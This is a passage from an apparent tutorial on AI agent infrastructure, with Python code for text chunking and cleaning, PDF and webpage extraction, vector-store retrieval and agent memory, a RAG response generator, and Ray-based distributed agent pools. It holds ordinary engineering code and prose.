156 """
157 chunks = self.split_text(text)
158 results = []
159
160 for i, chunk in enumerate(chunks):
161 # Create chunk ID
162 if document_id:
163 chunk_id = f"{document_id}_chunk_{i}"
164 else:
165 # Create a hash-based ID if none provided
166 chunk_hash = hashlib.md5(chunk.encode()).hexdigest()
167 chunk_id = f"chunk_{chunk_hash}"
168
169 # Create chunk metadata
170 chunk_metadata = metadata.copy()
171 chunk_metadata.update({
172 "chunk_index": i,
173 "chunk_count": len(chunks),
174 "is_first_chunk": i == 0,
175 "is_last_chunk": i == len(chunks) - 1,
176 "text_length": len(chunk)
177 })
178
179 results.append((chunk, chunk_metadata, chunk_id))
180
181 return results
182
183class TextProcessor:
184 """
185 Processes text for better retrieval in vector databases.
186 """
187
188 def __init__(self,
189 chunker: TextChunker,
190 clean_html: bool = True,
191 normalize_whitespace: bool = True,
192 strip_markdown: bool = True):
193 """
194 Initialize the text processor.
195
196 Args:
197 chunker: TextChunker instance for splitting text
198 clean_html: Whether to remove HTML tags
199 normalize_whitespace: Whether to normalize whitespace
200 strip_markdown: Whether to remove Markdown formatting
201 """
202 self.chunker = chunker
203 self.clean_html = clean_html
204 self.normalize_whitespace = normalize_whitespace
205 self.strip_markdown = strip_markdown
206
207 def process_document(self, text: str, metadata: Dict[str, Any]) -> List[Tuple[str, Dict[str, Any], str]]:
208 """
209 Process a document for storage in a vector database.
210
211 Args:
212 text: Document text
213 metadata: Document metadata
214
215 Returns:
216 List of (processed_chunk, metadata, id) tuples
217 """
218 # Clean the text
219 cleaned_text = self.clean_text(text)
220
221 # Create a document ID based on content
222 doc_hash = hashlib.md5(cleaned_text.encode()).hexdigest()
223 document_id = metadata.get("id", f"doc_{doc_hash}")
224
225 # Split into chunks with metadata
226 return self.chunker.get_text_chunks_with_metadata(
227 cleaned_text, metadata, document_id
228 )
229
230 def clean_text(self, text: str) -> str:
231 """
232 Clean text by removing unwanted formatting.
233
234 Args:
235 text: Text to clean
236
237 Returns:
238 Cleaned text
239 """
240 if not text:
241 return ""
242
243 # Remove HTML tags
244 if self.clean_html:
245 text = self._remove_html(text)
246
247 # Remove Markdown formatting
248 if self.strip_markdown:
249 text = self._remove_markdown(text)
250
251 # Normalize whitespace
252 if self.normalize_whitespace:
253 text = self._normalize_whitespace(text)
254
255 return text
256
257 def _remove_html(self, text: str) -> str:
258 """
259 Remove HTML tags from text.
260
261 Args:
262 text: Text containing HTML
263
264 Returns:
265 Text with HTML tags removed
266 """
267 # Simple regex-based HTML tag removal
268 text = re.sub(r'<[^>]+>', ' ', text)
269
270 # Replace HTML entities
271 text = re.sub(r'&nbsp;', ' ', text)
272 text = re.sub(r'&lt;', '<', text)
273 text = re.sub(r'&gt;', '>', text)
274 text = re.sub(r'&amp;', '&', text)
275 text = re.sub(r'&quot;', '"', text)
276 text = re.sub(r'&apos;', "'", text)
277
278 return text
279
280 def _remove_markdown(self, text: str) -> str:
281 """
282 Remove Markdown formatting from text.
283
284 Args:
285 text: Text containing Markdown
286
287 Returns:
288 Text with Markdown formatting removed
289 """
290 # Headers
291 text = re.sub(r'^\s*#+\s+', '', text, flags=re.MULTILINE)
292
293 # Bold, italic
294 text = re.sub(r'\*\*(.*?)\*\*', r'\1', text)
295 text = re.sub(r'\*(.*?)\*', r'\1', text)
296 text = re.sub(r'__(.*?)__', r'\1', text)
297 text = re.sub(r'_(.*?)_', r'\1', text)
298
299 # Code blocks
300 text = re.sub(r'```.*?\n(.*?)```', r'\1', text, flags=re.DOTALL)
301 text = re.sub(r'`(.*?)`', r'\1', text)
302
        # Images (must run before links, or "![alt](url)" is left as "!alt")
        text = re.sub(r'!\[(.*?)\]\(.*?\)', r'\1', text)

        # Links
        text = re.sub(r'\[(.*?)\]\(.*?\)', r'\1', text)
308
309 # Lists
310 text = re.sub(r'^\s*[\*\-+]\s+', '', text, flags=re.MULTILINE)
311 text = re.sub(r'^\s*\d+\.\s+', '', text, flags=re.MULTILINE)
312
313 # Blockquotes
314 text = re.sub(r'^\s*>\s+', '', text, flags=re.MULTILINE)
315
316 return text
317
318 def _normalize_whitespace(self, text: str) -> str:
319 """
320 Normalize whitespace in text.
321
322 Args:
323 text: Text with irregular whitespace
324
325 Returns:
326 Text with normalized whitespace
327 """
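        # Normalize line endings, then collapse runs of spaces and tabs.
        # Collapsing every whitespace run (r'\s+') would also erase the
        # paragraph breaks that the next step is meant to preserve.
        text = text.replace('\r\n', '\n').replace('\r', '\n')
        text = re.sub(r'[ \t\f\v]+', ' ', text)

        # Drop spaces around line breaks and cap blank lines so paragraphs
        # stay separated by exactly one empty line
        text = re.sub(r' ?\n ?', '\n', text)
        text = re.sub(r'\n{3,}', '\n\n', text)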
333
334 # Remove leading/trailing whitespace
335 text = text.strip()
336
337 return text
338
339class PDFTextExtractor:
340 """
341 Extracts text from PDF documents for storage in a vector database.
342 """
343
344 def __init__(self, processor: TextProcessor, extract_images: bool = False):
345 """
346 Initialize the PDF text extractor.
347
348 Args:
349 processor: TextProcessor for processing extracted text
350 extract_images: Whether to extract and process images
351 """
352 self.processor = processor
353 self.extract_images = extract_images
354
355 def process_pdf(self,
356 pdf_path: str,
357 metadata: Optional[Dict[str, Any]] = None) -> List[Tuple[str, Dict[str, Any], str]]:
358 """
359 Process a PDF file for storage in a vector database.
360
361 Args:
362 pdf_path: Path to PDF file
363 metadata: Optional metadata to include
364
365 Returns:
366 List of (processed_chunk, metadata, id) tuples
367 """
368 try:
369 import pypdf
370
371 # Extract metadata from PDF
372 pdf_metadata = self._extract_pdf_metadata(pdf_path)
373
374 # Combine with provided metadata
375 if metadata:
376 combined_metadata = {**pdf_metadata, **metadata}
377 else:
378 combined_metadata = pdf_metadata
379
380 # Extract text from PDF
381 text = self._extract_text(pdf_path)
382
383 # Process the extracted text
384 return self.processor.process_document(text, combined_metadata)
385
386 except ImportError:
387 logger.error("PyPDF library not installed. Install with 'pip install pypdf'")
388 raise
389 except Exception as e:
390 logger.error(f"Error processing PDF {pdf_path}: {e}")
391 raise
392
393 def _extract_pdf_metadata(self, pdf_path: str) -> Dict[str, Any]:
394 """
395 Extract metadata from a PDF file.
396
397 Args:
398 pdf_path: Path to PDF file
399
400 Returns:
401 Dictionary of metadata
402 """
403 import pypdf
404
405 with open(pdf_path, 'rb') as f:
406 pdf = pypdf.PdfReader(f)
407 info = pdf.metadata
408
409 # Extract basic metadata
410 metadata = {
411 "source": pdf_path,
412 "file_type": "pdf",
413 "page_count": len(pdf.pages)
414 }
415
416 # Add PDF metadata if available
417 if info:
418 if info.title:
419 metadata["title"] = info.title
420 if info.author:
421 metadata["author"] = info.author
422 if info.subject:
423 metadata["subject"] = info.subject
424 if info.creator:
425 metadata["creator"] = info.creator
426 if info.producer:
427 metadata["producer"] = info.producer
428 if info.creation_date:
429 metadata["creation_date"] = str(info.creation_date)
430
431 return metadata
432
433 def _extract_text(self, pdf_path: str) -> str:
434 """
435 Extract text content from a PDF file.
436
437 Args:
438 pdf_path: Path to PDF file
439
440 Returns:
441 Extracted text
442 """
443 import pypdf
444
445 with open(pdf_path, 'rb') as f:
446 pdf = pypdf.PdfReader(f)
447 text = ""
448
449 # Extract text from each page
450 for page_num, page in enumerate(pdf.pages):
451 page_text = page.extract_text()
452 if page_text:
453 text += f"Page {page_num + 1}:\n{page_text}\n\n"
454
455 # Extract text from images if enabled
456 if self.extract_images:
457 image_text = self._extract_image_text(pdf_path)
458 if image_text:
459 text += f"\nText from images:\n{image_text}\n"
460
461 return text
462
463 def _extract_image_text(self, pdf_path: str) -> str:
464 """
465 Extract text from images in a PDF file using OCR.
466
467 Args:
468 pdf_path: Path to PDF file
469
470 Returns:
471 Extracted text from images
472 """
473 # This would require OCR libraries like pytesseract
474 # Implementation depends on specific requirements
475 # Placeholder implementation
476 return ""
477
478class WebpageTextExtractor:
479 """
480 Extracts text from webpages for storage in a vector database.
481 """
482
483 def __init__(self, processor: TextProcessor):
484 """
485 Initialize the webpage text extractor.
486
487 Args:
488 processor: TextProcessor for processing extracted text
489 """
490 self.processor = processor
491
492 def process_url(self,
493 url: str,
494 metadata: Optional[Dict[str, Any]] = None) -> List[Tuple[str, Dict[str, Any], str]]:
495 """
496 Process a webpage for storage in a vector database.
497
498 Args:
499 url: URL of webpage
500 metadata: Optional metadata to include
501
502 Returns:
503 List of (processed_chunk, metadata, id) tuples
504 """
505 try:
506 import requests
507 from bs4 import BeautifulSoup
508
            # Fetch webpage (the timeout keeps a stalled server from hanging the caller)
            response = requests.get(
                url,
                headers={
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
                },
                timeout=30
            )
513 response.raise_for_status()
514
515 # Parse HTML
516 soup = BeautifulSoup(response.text, 'html.parser')
517
518 # Extract metadata
519 webpage_metadata = self._extract_webpage_metadata(soup, url)
520
521 # Combine with provided metadata
522 if metadata:
523 combined_metadata = {**webpage_metadata, **metadata}
524 else:
525 combined_metadata = webpage_metadata
526
527 # Extract main content
528 content = self._extract_main_content(soup)
529
530 # Process the extracted content
531 return self.processor.process_document(content, combined_metadata)
532
533 except ImportError:
534 logger.error("Required libraries not installed. Install with 'pip install requests beautifulsoup4'")
535 raise
536 except Exception as e:
537 logger.error(f"Error processing URL {url}: {e}")
538 raise
539
540 def _extract_webpage_metadata(self, soup, url: str) -> Dict[str, Any]:
541 """
542 Extract metadata from a webpage.
543
544 Args:
545 soup: BeautifulSoup object
546 url: URL of webpage
547
548 Returns:
549 Dictionary of metadata
550 """
551 metadata = {
552 "source": url,
553 "file_type": "webpage"
554 }
555
556 # Extract title
557 title_tag = soup.find('title')
558 if title_tag:
559 metadata["title"] = title_tag.text.strip()
560
561 # Extract description
562 description_tag = soup.find('meta', attrs={'name': 'description'})
563 if description_tag:
564 metadata["description"] = description_tag.get('content', '')
565
566 # Extract author
567 author_tag = soup.find('meta', attrs={'name': 'author'})
568 if author_tag:
569 metadata["author"] = author_tag.get('content', '')
570
571 # Extract publication date
572 date_tag = soup.find('meta', attrs={'property': 'article:published_time'})
573 if date_tag:
574 metadata["publication_date"] = date_tag.get('content', '')
575
576 # Extract keywords/tags
577 keywords_tag = soup.find('meta', attrs={'name': 'keywords'})
578 if keywords_tag:
579 keywords = keywords_tag.get('content', '')
580 if keywords:
581 metadata["keywords"] = [k.strip() for k in keywords.split(',')]
582
583 return metadata
584
585 def _extract_main_content(self, soup) -> str:
586 """
587 Extract main content from a webpage.
588
589 Args:
590 soup: BeautifulSoup object
591
592 Returns:
593 Extracted text content
594 """
595 # Remove script and style elements
596 for script in soup(["script", "style", "header", "footer", "nav"]):
597 script.extract()
598
599 # Try to find the main content
600 main_content = None
601
602 # Look for common content containers
603 for selector in ['article', 'main', '[role="main"]', '.content', '#content', '.post', '.article']:
604 content_tag = soup.select_one(selector)
605 if content_tag:
606 main_content = content_tag
607 break
608
609 # If no main content container found, use body
610 if not main_content:
611 main_content = soup.body
612
613 # Extract text from content
614 if main_content:
615 # Get all paragraphs
616 paragraphs = main_content.find_all('p')
617 content = '\n\n'.join([p.get_text() for p in paragraphs])
618
619 # If no paragraphs found, use all text
620 if not content:
621 content = main_content.get_text()
622
623 return content
624
625 # Fallback to all text
626 return soup.get_text()
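
The overlap logic in TextChunker is easier to follow in isolation. The sketch below is a simplified stand-in, not the class above: `chunk_with_overlap` is a hypothetical helper that only looks for a space to cut on (no sentence detection), and the small default sizes are chosen purely for illustration. It shows the two properties any overlapping chunker needs: neighbouring chunks share `overlap` characters, and the loop stops once the tail of the text has been emitted.

```python
from typing import List


def chunk_with_overlap(text: str, chunk_size: int = 40, overlap: int = 10) -> List[str]:
    """Split text into overlapping character windows, preferring cuts after a space."""
    if chunk_size <= 0 or not 0 <= overlap < chunk_size:
        raise ValueError("need chunk_size > 0 and 0 <= overlap < chunk_size")

    text = text.strip()
    chunks: List[str] = []
    start = 0

    while start < len(text):
        end = min(start + chunk_size, len(text))

        if end < len(text):
            # Prefer to cut just after the last space inside the window,
            # as long as the chunk stays longer than the overlap.
            cut = text.rfind(" ", start + 1, end)
            if cut > start + overlap:
                end = cut + 1

        chunks.append(text[start:end])

        if end >= len(text):
            break  # final chunk emitted; do not step back into the tail again

        start = end - overlap  # neighbours share `overlap` characters

    return chunks


if __name__ == "__main__":
    sample = "Vector stores work best with short, self-contained passages. " * 3
    for piece in chunk_with_overlap(sample):
        print(repr(piece))
```

Because every chunk after the first starts exactly `overlap` characters before the previous chunk ended, the original text can be rebuilt by dropping the first `overlap` characters of each later chunk, which is a convenient invariant to assert in tests.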

4. Integration with AI Agent System

python
# vector_storage/integration.py
import datetime  # used by AgentMemory.get_relevant_memories
import json
import logging
import os
import time  # used for memory timestamps
import uuid  # used for memory IDs
from typing import Dict, List, Any, Optional, Union, Tuple

from .knowledge_base import KnowledgeBase, Document
from .text_processing import TextProcessor, TextChunker

logger = logging.getLogger(__name__)
11
12class VectorStoreRetriever:
13 """
14 Retriever for fetching relevant information from a knowledge base.
15 """
16
17 def __init__(self,
18 knowledge_base: KnowledgeBase,
19 max_results: int = 5,
20 similarity_threshold: float = 0.7):
21 """
22 Initialize the retriever.
23
24 Args:
25 knowledge_base: Knowledge base to query
26 max_results: Maximum number of results to return
27 similarity_threshold: Minimum similarity threshold
28 """
29 self.knowledge_base = knowledge_base
30 self.max_results = max_results
31 self.similarity_threshold = similarity_threshold
32
33 def retrieve(self,
34 query: str,
35 filter: Optional[Dict[str, Any]] = None,
36 rerank: bool = False) -> List[Document]:
37 """
38 Retrieve relevant documents for a query.
39
40 Args:
41 query: Query string
42 filter: Optional filter for metadata
43 rerank: Whether to rerank results with cross-encoder
44
45 Returns:
46 List of relevant documents
47 """
48 # Search knowledge base
49 documents = self.knowledge_base.search(
50 query=query,
51 top_k=self.max_results * 2 if rerank else self.max_results, # Get more results if reranking
52 threshold=self.similarity_threshold,
53 filter=filter
54 )
55
56 if not documents:
57 logger.info(f"No results found for query: {query}")
58 return []
59
60 # Rerank results if requested
61 if rerank and len(documents) > 0:
62 documents = self._rerank_results(query, documents)
63
64 # Limit to max_results
65 return documents[:self.max_results]
66
67 def _rerank_results(self, query: str, documents: List[Document]) -> List[Document]:
68 """
69 Rerank results using a cross-encoder model.
70
71 Args:
72 query: Original query
73 documents: Initial retrieval results
74
75 Returns:
76 Reranked documents
77 """
78 try:
79 from sentence_transformers import CrossEncoder
80
81 # Initialize cross-encoder
82 model = CrossEncoder('cross-encoder/ms-marco-MiniLM-L-6-v2')
83
84 # Prepare document pairs
85 document_pairs = [(query, doc.content) for doc in documents]
86
87 # Compute similarity scores
88 similarity_scores = model.predict(document_pairs)
89
90 # Update document scores
91 for i, score in enumerate(similarity_scores):
92 documents[i].score = float(score)
93
94 # Sort by new scores
95 documents.sort(key=lambda x: x.score, reverse=True)
96
97 return documents
98
99 except ImportError:
100 logger.warning("sentence-transformers not installed. Install with 'pip install sentence-transformers'")
101 return documents
102 except Exception as e:
103 logger.error(f"Error reranking results: {e}")
104 return documents
105
106 def retrieve_and_format(self,
107 query: str,
108 filter: Optional[Dict[str, Any]] = None,
109 max_tokens: int = 4000) -> str:
110 """
111 Retrieve and format documents as a string, ensuring it fits within token limits.
112
113 Args:
114 query: Query string
115 filter: Optional filter for metadata
116 max_tokens: Maximum tokens to return (approximate)
117
118 Returns:
119 Formatted context string
120 """
121 # Retrieve documents
122 documents = self.retrieve(query, filter)
123
124 if not documents:
125 return "No relevant information found."
126
127 # Format results
128 formatted_text = "Relevant information:\n\n"
129
130 char_count = len(formatted_text)
131 # Rough approximation of tokens to characters (1 token ≈ 4 characters)
132 max_chars = max_tokens * 4
133
134 for i, doc in enumerate(documents):
135 # Format document with score and metadata
136 doc_text = f"[Document {i+1} - Score: {doc.score:.2f}]\n"
137
138 # Add source info if available
139 if "source" in doc.metadata:
140 doc_text += f"Source: {doc.metadata.get('source', 'Unknown')}\n"
141
142 # Add content
143 doc_text += f"\n{doc.content}\n\n{'=' * 40}\n\n"
144
145 # Check if adding this document would exceed the token limit
146 if char_count + len(doc_text) > max_chars:
147 # If this is the first document, add a truncated version
148 if i == 0:
149 chars_remaining = max_chars - char_count
150 if chars_remaining > 100: # Only add if we can include enough meaningful content
151 truncated_content = doc.content[:chars_remaining - 100] + "... [truncated]"
152 doc_text = f"[Document {i+1} - Score: {doc.score:.2f}]\n"
153 if "source" in doc.metadata:
154 doc_text += f"Source: {doc.metadata.get('source', 'Unknown')}\n"
155 doc_text += f"\n{truncated_content}\n\n"
156 formatted_text += doc_text
157 break
158
159 formatted_text += doc_text
160 char_count += len(doc_text)
161
162 return formatted_text
163
164class AgentMemory:
165 """
166 Long-term memory for AI agents using vector storage.
167 """
168
169 def __init__(self,
170 knowledge_base: KnowledgeBase,
171 text_processor: TextProcessor,
172 namespace: str = "agent_memory"):
173 """
174 Initialize agent memory.
175
176 Args:
177 knowledge_base: Knowledge base for storing memories
178 text_processor: Text processor for processing memories
179 namespace: Namespace for this agent's memories
180 """
181 self.knowledge_base = knowledge_base
182 self.text_processor = text_processor
183 self.namespace = namespace
184
185 def add_interaction(self,
186 user_input: str,
187 agent_response: str,
188 metadata: Optional[Dict[str, Any]] = None) -> str:
189 """
190 Add a user-agent interaction to memory.
191
192 Args:
193 user_input: User input text
194 agent_response: Agent response text
195 metadata: Optional additional metadata
196
197 Returns:
198 Memory ID
199 """
200 # Create interaction text
201 interaction_text = f"User: {user_input}\n\nAgent: {agent_response}"
202
203 # Prepare metadata
204 memory_metadata = {
205 "type": "interaction",
206 "timestamp": str(time.time()),
207 "namespace": self.namespace
208 }
209
210 if metadata:
211 memory_metadata.update(metadata)
212
213 # Process the interaction for storage
214 memory_id = f"memory_{str(uuid.uuid4())}"
215
216 # Create a document
217 document = Document(
218 id=memory_id,
219 content=interaction_text,
220 metadata=memory_metadata
221 )
222
223 # Add to knowledge base
224 self.knowledge_base.add_document(document)
225
226 return memory_id
227
228 def add_reflection(self,
229 reflection: str,
230 metadata: Optional[Dict[str, Any]] = None) -> str:
231 """
232 Add an agent reflection to memory.
233
234 Args:
235 reflection: Reflection text
236 metadata: Optional additional metadata
237
238 Returns:
239 Memory ID
240 """
241 # Prepare metadata
242 memory_metadata = {
243 "type": "reflection",
244 "timestamp": str(time.time()),
245 "namespace": self.namespace
246 }
247
248 if metadata:
249 memory_metadata.update(metadata)
250
251 # Process the reflection for storage
252 memory_id = f"reflection_{str(uuid.uuid4())}"
253
254 # Create a document
255 document = Document(
256 id=memory_id,
257 content=reflection,
258 metadata=memory_metadata
259 )
260
261 # Add to knowledge base
262 self.knowledge_base.add_document(document)
263
264 return memory_id
265
266 def search_memory(self,
267 query: str,
268 memory_type: Optional[str] = None,
269 limit: int = 5) -> List[Dict[str, Any]]:
270 """
271 Search agent memory.
272
273 Args:
274 query: Search query
275 memory_type: Optional memory type filter
276 limit: Maximum number of results
277
278 Returns:
279 List of memory entries
280 """
281 # Create filter
282 filter = {"namespace": self.namespace}
283
284 if memory_type:
285 filter["type"] = memory_type
286
287 # Search knowledge base
288 documents = self.knowledge_base.search(
289 query=query,
290 top_k=limit,
291 filter=filter
292 )
293
294 # Format results
295 results = []
296 for doc in documents:
297 results.append({
298 "id": doc.id,
299 "content": doc.content,
300 "type": doc.metadata.get("type", "unknown"),
301 "timestamp": doc.metadata.get("timestamp", ""),
302 "relevance": doc.score
303 })
304
305 return results
306
307 def get_relevant_memories(self,
308 current_input: str,
309 limit: int = 3) -> str:
310 """
311 Get relevant memories for the current user input.
312
313 Args:
314 current_input: Current user input
315 limit: Maximum number of memories to retrieve
316
317 Returns:
318 Formatted string with relevant memories
319 """
320 # Search for relevant memories
321 memories = self.search_memory(current_input, limit=limit)
322
323 if not memories:
324 return ""
325
326 # Format memories
327 formatted_memories = "Relevant past interactions:\n\n"
328
329 for i, memory in enumerate(memories):
330 memory_type = memory.get("type", "interaction").capitalize()
331 timestamp = memory.get("timestamp", "")
332
333 # Try to convert timestamp to human-readable format
334 try:
335 timestamp_float = float(timestamp)
336 timestamp_str = datetime.datetime.fromtimestamp(timestamp_float).strftime("%Y-%m-%d %H:%M:%S")
337 except (ValueError, TypeError):
338 timestamp_str = timestamp
339
340 formatted_memories += f"--- {memory_type} ({timestamp_str}) ---\n"
341 formatted_memories += memory.get("content", "") + "\n\n"
342
343 return formatted_memories
344
345class RAGProcessor:
346 """
347 Retrieval-Augmented Generation (RAG) processor for AI agents.
348 """
349
350 def __init__(self,
351 retriever: VectorStoreRetriever,
352 response_generator: Optional[callable] = None,
353 max_context_tokens: int = 4000):
354 """
355 Initialize the RAG processor.
356
357 Args:
358 retriever: Retriever for fetching relevant information
359 response_generator: Optional function for generating responses
360 max_context_tokens: Maximum tokens for context
361 """
362 self.retriever = retriever
363 self.response_generator = response_generator
364 self.max_context_tokens = max_context_tokens
365
366 def generate_response(self,
367 query: str,
368 filter: Optional[Dict[str, Any]] = None,
369 additional_context: Optional[str] = None,
370 system_prompt: Optional[str] = None) -> Dict[str, Any]:
371 """
372 Generate a response using RAG.
373
374 Args:
375 query: User query
376 filter: Optional filter for knowledge base
377 additional_context: Optional additional context
378 system_prompt: Optional system prompt
379
380 Returns:
381 Dictionary with response and metadata
382 """
383 # Retrieve relevant information
384 retrieved_context = self.retriever.retrieve_and_format(
385 query=query,
386 filter=filter,
387 max_tokens=self.max_context_tokens
388 )
389
390 # Combine with additional context if provided
391 context = retrieved_context
392 if additional_context:
393 context = f"{additional_context}\n\n{context}"
394
395 # Generate response
396 if self.response_generator:
397 # Use provided response generator
398 response = self.response_generator(query, context, system_prompt)
399 else:
400 # Use default OpenAI-based generator
401 response = self._default_response_generator(query, context, system_prompt)
402
403 return {
404 "response": response,
405 "retrieved_context": retrieved_context,
406 "query": query
407 }
408
409 def _default_response_generator(self,
410 query: str,
411 context: str,
412 system_prompt: Optional[str] = None) -> str:
413 """
414 Generate a response using OpenAI.
415
416 Args:
417 query: User query
418 context: Retrieved context
419 system_prompt: Optional system prompt
420
421 Returns:
422 Generated response
423 """
        from openai import OpenAI

        if not system_prompt:
            system_prompt = (
                "You are a helpful AI assistant. Use the provided information "
                "to answer the user's question. If the information doesn't "
                "contain the answer, say you don't know."
            )

        messages = [
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": f"Information:\n{context}\n\nQuestion: {query}"}
        ]

        # openai>=1.0 client API (openai.ChatCompletion was removed in 1.0);
        # the API key is read from the OPENAI_API_KEY environment variable
        client = OpenAI()
        response = client.chat.completions.create(
            model="gpt-4-turbo",
            messages=messages,
            temperature=0.5,
            max_tokens=1000
        )

        return response.choices[0].message.content
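
The budget handling in retrieve_and_format comes down to greedy packing under a character limit. The following is a minimal sketch of that idea, assuming documents arrive already sorted by relevance as plain `(content, score)` pairs. `pack_context` and `CHARS_PER_TOKEN` are hypothetical names introduced for illustration, and the 4-characters-per-token figure is the same rough approximation used above, not a real tokenizer count.

```python
from typing import List, Tuple

CHARS_PER_TOKEN = 4  # rough heuristic; a real tokenizer would be more accurate


def pack_context(docs: List[Tuple[str, float]], max_tokens: int) -> str:
    """Greedily append (content, score) pairs until the character budget is spent."""
    budget = max_tokens * CHARS_PER_TOKEN
    parts: List[str] = []
    used = 0

    for i, (content, score) in enumerate(docs, start=1):
        block = f"[Document {i} - Score: {score:.2f}]\n{content}\n\n"
        if used + len(block) > budget:
            break  # stop at the first document that does not fit
        parts.append(block)
        used += len(block)

    return "".join(parts)


if __name__ == "__main__":
    ranked = [
        ("Ray actors hold per-agent state.", 0.91),
        ("Chunk overlap preserves context across boundaries.", 0.84),
        ("A very long appendix. " * 50, 0.60),
    ]
    print(pack_context(ranked, max_tokens=60))
```

Stopping at the first document that does not fit keeps the highest-ranked results intact. Skipping an oversized document and continuing with smaller, lower-ranked ones is a reasonable alternative when filling the window matters more than strict rank order.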

Handling Large-Scale AI Workloads with Distributed Computing

Distributed computing is essential for scaling AI agent systems across multiple machines. Here are key implementation patterns:

1. Ray Distributed Framework Integration

python
1# distributed/ray_integration.py
2import os
3import json
4import time
5import logging
6import ray
7from typing import Dict, List, Any, Optional, Union, Tuple
8
9logger = logging.getLogger(__name__)
10
11# Initialize Ray (will use local Ray cluster if running, otherwise starts one)
12if not ray.is_initialized():
13 ray.init(address=os.environ.get("RAY_ADDRESS", None))
14
15@ray.remote
16class DistributedAgentActor:
17 """Ray actor for running AI agents in a distributed manner."""
18
19 def __init__(self, agent_config: Dict[str, Any]):
20 """
21 Initialize the agent actor.
22
23 Args:
24 agent_config: Configuration for the agent
25 """
26 self.agent_config = agent_config
27 self.agent_type = agent_config.get("agent_type", "general")
28 self.model = agent_config.get("model", "gpt-4-turbo")
29 self.agent_id = f"{self.agent_type}_{time.time()}"
30
31 # Agent state
32 self.conversation_history = []
33 self.metadata = {}
34 self.is_initialized = False
35
36 # Initialize the agent
37 self._initialize_agent()
38
39 def _initialize_agent(self):
40 """Initialize the underlying agent."""
41 try:
42 import autogen
43
44 # Configure the agent based on type
45 system_message = self.agent_config.get("system_message", "You are a helpful assistant.")
46
47 # Create Agent
48 self.agent = autogen.AssistantAgent(
49 name=self.agent_config.get("name", "Assistant"),
50 system_message=system_message,
51 llm_config={
52 "model": self.model,
53 "temperature": self.agent_config.get("temperature", 0.7),
54 "max_tokens": self.agent_config.get("max_tokens", 1000)
55 }
56 )
57
58 # Create UserProxyAgent for handling conversations
59 self.user_proxy = autogen.UserProxyAgent(
60 name="User",
61 human_input_mode="NEVER",
62 max_consecutive_auto_reply=0,
63 code_execution_config=False
64 )
65
66 self.is_initialized = True
67 logger.info(f"Agent {self.agent_id} initialized successfully")
68
69 except Exception as e:
70 logger.error(f"Error initializing agent {self.agent_id}: {e}")
71 self.is_initialized = False
72
73 def generate_response(self, message: str, context: Optional[str] = None) -> Dict[str, Any]:
74 """
75 Generate a response to a message.
76
77 Args:
78 message: User message
79 context: Optional context
80
81 Returns:
82 Response data
83 """
84 if not self.is_initialized:
85 return {"error": "Agent not initialized properly"}
86
87 try:
88 # Prepare the full message with context if provided
89 full_message = message
90 if context:
91 full_message = f"{context}\n\nUser message: {message}"
92
93 # Reset the conversation
94 self.user_proxy.reset()
95
96 # Start the conversation
97 start_time = time.time()
98 self.user_proxy.initiate_chat(
99 self.agent,
100 message=full_message
101 )
102
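            # Extract the assistant's reply. This assumes pyautogen 0.2-style
            # agents, which expose last_message() rather than a chat_history
            # attribute. Because the proxy never auto-replies, the latest
            # message exchanged with the agent is the assistant's answer.
            last_message = self.user_proxy.last_message(self.agent)
            response_content = last_message.get("content") if last_message else None

            if not response_content:
                raise ValueError("No response generated")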
112
113 # Calculate processing time
114 processing_time = time.time() - start_time
115
116 # Update conversation history
117 self.conversation_history.append({
118 "role": "user",
119 "content": message,
120 "timestamp": time.time()
121 })
122
123 self.conversation_history.append({
124 "role": "assistant",
125 "content": response_content,
126 "timestamp": time.time()
127 })
128
129 # Prepare response data
130 response_data = {
131 "response": response_content,
132 "agent_id": self.agent_id,
133 "agent_type": self.agent_type,
134 "model": self.model,
135 "processing_time": processing_time
136 }
137
138 return response_data
139
140 except Exception as e:
141 logger.error(f"Error generating response: {e}")
142 return {"error": str(e), "agent_id": self.agent_id}
143
144 def get_conversation_history(self) -> List[Dict[str, Any]]:
145 """
146 Get the conversation history.
147
148 Returns:
149 List of conversation messages
150 """
151 return self.conversation_history
152
153 def set_metadata(self, key: str, value: Any) -> None:
154 """
155 Set metadata for the agent.
156
157 Args:
158 key: Metadata key
159 value: Metadata value
160 """
161 self.metadata[key] = value
162
163 def get_metadata(self, key: Optional[str] = None) -> Any:
164 """
165 Get agent metadata.
166
167 Args:
168 key: Optional specific metadata key
169
170 Returns:
171 Metadata value or all metadata
172 """
173 if key:
174 return self.metadata.get(key)
175 return self.metadata
176
177@ray.remote
178class AgentPoolManager:
179 """Manages a pool of agent actors for efficient resource utilization."""
180
181 def __init__(self,
182 agent_configs: Dict[str, Dict[str, Any]],
183 max_agents_per_type: int = 5,
184 idle_timeout_seconds: int = 300):
185 """
186 Initialize the agent pool manager.
187
188 Args:
189 agent_configs: Dictionary mapping agent types to configurations
190 max_agents_per_type: Maximum number of agents per type
191 idle_timeout_seconds: Seconds of inactivity before removing an agent
192 """
193 self.agent_configs = agent_configs
194 self.max_agents_per_type = max_agents_per_type
195 self.idle_timeout_seconds = idle_timeout_seconds
196
197 # Initialize pools
198 self.agent_pools = {}
199 self.busy_agents = {}
200 self.last_used = {}
201
202 # Create initial agents
203 self._initialize_pools()
204
205 # Start maintenance task
206 self._start_maintenance()
207
208 def _initialize_pools(self):
209 """Initialize agent pools with minimal agents."""
210 for agent_type, config in self.agent_configs.items():
211 self.agent_pools[agent_type] = []
212 self.busy_agents[agent_type] = {}
213
214 # Create one initial agent per type
215 agent_ref = DistributedAgentActor.remote(config)
216 self.agent_pools[agent_type].append(agent_ref)
217 self.last_used[agent_ref] = time.time()
218
219 def _start_maintenance(self):
220 """Start the maintenance task to manage pool size."""
221 import threading
222
223 def maintenance_task():
224 while True:
225 try:
226 self._cleanup_idle_agents()
227 except Exception as e:
228 logger.error(f"Error in maintenance task: {e}")
229
230 time.sleep(60) # Run maintenance every minute
231
232 # Start maintenance thread
233 maintenance_thread = threading.Thread(target=maintenance_task, daemon=True)
234 maintenance_thread.start()
235
236 def _cleanup_idle_agents(self):
237 """Remove idle agents to free resources."""
238 current_time = time.time()
239
240 for agent_type, pool in self.agent_pools.items():
241 # Keep at least one agent per type
242 if len(pool) <= 1:
243 continue
244
245 # Check each agent in the pool
246 for agent_ref in list(pool): # Copy list as we might modify it
247 # Skip if agent is not in last_used (shouldn't happen)
248 if agent_ref not in self.last_used:
249 continue
250
251 # Check if agent has been idle for too long
252 idle_time = current_time - self.last_used[agent_ref]
